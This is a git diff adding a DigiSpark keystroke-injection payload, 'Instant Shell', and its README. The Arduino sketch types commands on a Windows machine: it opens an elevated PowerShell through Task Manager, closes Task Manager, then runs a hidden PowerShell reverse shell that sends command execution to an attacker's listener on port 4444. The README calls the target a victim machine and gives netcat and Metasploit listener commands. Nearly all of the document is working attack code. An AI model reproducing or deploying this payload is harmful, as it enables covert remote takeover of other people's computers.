diff --git a/payloads/.DS_Store b/payloads/.DS_Store new file mode 100644 index 0000000..b85c13b Binary files /dev/null and b/payloads/.DS_Store differ diff --git a/payloads/Instant Shell/Instant_Shell.ino b/payloads/Instant Shell/Instant_Shell.ino new file mode 100644 index 0000000..ec9390d --- /dev/null +++ b/payloads/Instant Shell/Instant_Shell.ino @@ -0,0 +1,33 @@ +#include "DigiKeyboard.h" +#define KEY_TAB 0x2b +void setup() { + pinMode(1, OUTPUT); //LED on Model A +} +void loop() { + DigiKeyboard.update(); + DigiKeyboard.sendKeyStroke(0); + DigiKeyboard.delay(3000); + + DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run + DigiKeyboard.delay(500); + DigiKeyboard.println("taskmgr"); //starting taskmgr + DigiKeyboard.delay(5000); + DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT); + DigiKeyboard.sendKeyStroke(KEY_N);//run + DigiKeyboard.delay(2000); + DigiKeyboard.print("powershell -noexit -command \"mode con cols=18 lines=1\"");//start tiny PowerShell + DigiKeyboard.sendKeyStroke(KEY_TAB); + DigiKeyboard.sendKeyStroke(KEY_SPACE);//turn on admin privileges + DigiKeyboard.sendKeyStroke(KEY_ENTER); //run + DigiKeyboard.delay(5000); + DigiKeyboard.println("taskkill /IM \"taskmgr.exe\" /F ");//killing taskmanager + DigiKeyboard.delay(2000); + DigiKeyboard.println("cmd");//run cmd + DigiKeyboard.delay(2000); + DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker + DigiKeyboard.delay(5000); + digitalWrite(1, HIGH); //turn on led when program finishes + DigiKeyboard.delay(90000); + digitalWrite(1, LOW); + DigiKeyboard.delay(5000); +} diff --git a/payloads/Instant Shell/README.md b/payloads/Instant Shell/README.md new file mode 100644 index 0000000..30f81e4 --- /dev/null +++ b/payloads/Instant Shell/README.md @@ -0,0 +1,26 @@ +# Instant Shell + +### Description: + +#### 1: Instant_Shell.ino:
+Starting instant shell to an attacker machine in less than 1 minute.
+ +**Payload by:** [hum4nG0D](https://github.com/hum4nG0D/) + +Get instant interactive reverse powershell shell in less than a minute and send commands remotely to victim machine. Interactive reverse Powershell shell script from [Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html) + +**Instructions:** +Start an nc listener or metasploit listener. Be sure to change IP and Port. Adjust script delay which suits best to your computer. + +``` +nc -lvnp 4444 +``` + +``` +msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport 4444; set ExitOnSession false; exploit -j" +``` + +**Tested on:**
+**OS**: Windows 10|11
+**User**: Admin/Normal User
+**Hardware**: ATtiny85